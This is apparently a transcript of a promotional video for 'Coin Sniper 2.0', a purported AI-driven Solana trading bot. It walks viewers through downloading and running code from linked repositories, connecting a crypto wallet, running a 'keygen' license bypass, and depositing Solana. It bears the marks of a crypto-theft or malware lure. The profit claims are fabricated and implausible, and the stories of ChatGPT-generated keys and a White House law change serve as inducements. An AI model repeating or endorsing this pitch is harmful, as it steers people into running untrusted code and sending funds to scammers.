Friends, I think everyone remembers the news that a group of traders made huge X's on the meme coins, right? Well, here's what I found out. It turns out it was all thanks to Coin Sniper 2.0. Yes, exactly, 2.0. Where did we figure that out? One of Coin Sniper's leading developers, a former Solana developer, posted this on Twitter. What else could we think? Coin Sniper 2.0 runs on the artificial intelligence system Gemini AI. It has a database of verified callers, tracks tweets from crypto giants, and watches whale movements in the market. It monitors tokens and makes trading decisions. If suddenly the volume of purchases of a certain token starts to increase, the AI reacts and gets to work. The bot operates carefully, not allowing losses. Throughout my entire time using the Solana bot, I've only seen a huge plus to my investments. Coin Sniper 1.0 is exactly the program Jupiter mentioned on one of his streams, which already attracted a lot of attention.
Yes, we know about the Coin Sniper bot. I suggested to the guys that we integrate it into the drop system later.
And of course, many enthusiasts tried to gain access to it. Anyone could download it, but actually getting the key? Once someone managed that, anyone who got in was in chocolate. Who turned out to be the sniper team's problem? And an ordinary trader's good fortune? ChatGPT. ChatGPT was able to generate keys for Coin Sniper 1.0, and people used them completely free. Unfortunately, that protection bypass using ChatGPT didn't last long, and naturally, it all got back to the developers, who include one of Solana's leading developers. And what's happening now? An updated version of the bot, Coin Sniper 2.0, has appeared. It has an updated design, improved protection, and incomparable performance. Now, 2.0 works even better, but it's also far more secure than 1.0, though unfortunately the developers can't fully escape the previous version's issues, because the code remains open thanks to the repeal of the old law and its reissuance with new wording by the White House administration. The main thing, guys, is to understand the gist. Hurry while there's still time. Consider access to the program maximally exclusive right now, because the developers are actively working on Coin Sniper and obviously won't allow the same situation as last time. The bypass I'll show you clearly won't work as long as we hope. So let me show you exactly how to install it. Go to the repository of our bots project. The link is in the description. Click the code button and download the archive with the code in zip format. Go to the official Python website and download the installer. Run the downloaded exe file to begin the installation process. Be sure to check the box next to add python.exe to path, then choose the standard installation version. Excellent, Python is installed and you can close that window. Go back to the archive with the bot files. Extract them into the same folder. Right-click on the file and choose Extract Here from the archive options. So here are all of our files. Now let's open the command line from this folder. To do this, type cmd in the address bar and press Enter. Go back to GitHub, copy the second command, paste it into the terminal, and press Enter to install the necessary dependencies. After the dependencies are installed, run the third command to launch the bot. After you run the command, the bot should start. On the bot page, click Configure and select the available wallet in the Select Wallet field. A window will open to confirm the extension. Click Connect. Now we move on to our bypass using the keygen. It's also an open source project on GitHub, and you can download it from there just like Coin Sniper 2.0. The link is also in the description. Follow the same steps as with the previous bot archive. Download the keygen from the GitHub repository, extract it, and run it with the command python main.py. Enter the port on which Coin Sniper is running, usually port 5000. Leave the port blank if you haven't changed it in the Coin Sniper bot. Note that the bot must be running or the keygen will throw an error. After you enter the port, the keygen will start selecting license keys and provide a working key. Insert that key into Coin Sniper. Paste the code you receive. Apply the configuration. You can transfer funds via the button or directly to the address. To do this, send Solana to the specified address. After transferring the Solana, click the Check Deposit button. I'm going to top up via the Phantom wallet because that's more convenient. Enter the required amount of Solana in the deposit input field. Click the deposit button. Confirm the transaction. Great, our bot has now started working. The bot launches immediately after the deposit. On this panel, we can monitor the bot's activity, the number of transactions executed, the operating time, and the amount the bot has earned. So more than 6 hours have passed since starting the bot, and our profit during this time is $384. Now 12 hours have passed, and our bot has earned $842. Now let's withdraw our profit. To withdraw funds, click Stop to stop the bot. Then click Withdraw, and you'll be redirected to your profile. Click Withdraw again, and choose a convenient withdrawal method. I'll pick cryptocurrency. Now select the needed cryptocurrency and enter your address. I'll choose Solana. Click Confirm and wait while the withdrawal transaction is processed on the blockchain. Go to your wallet and we see the funds have arrived in our account. Hey, if you found this video helpful, don't forget to hit the like button, subscribe, and turn on notifications so you don't miss any new videos. All the necessary links and commands will be in the description. If you have any questions or need further assistance, leave a comment below. Thanks for watching and good luck trading with your new bot.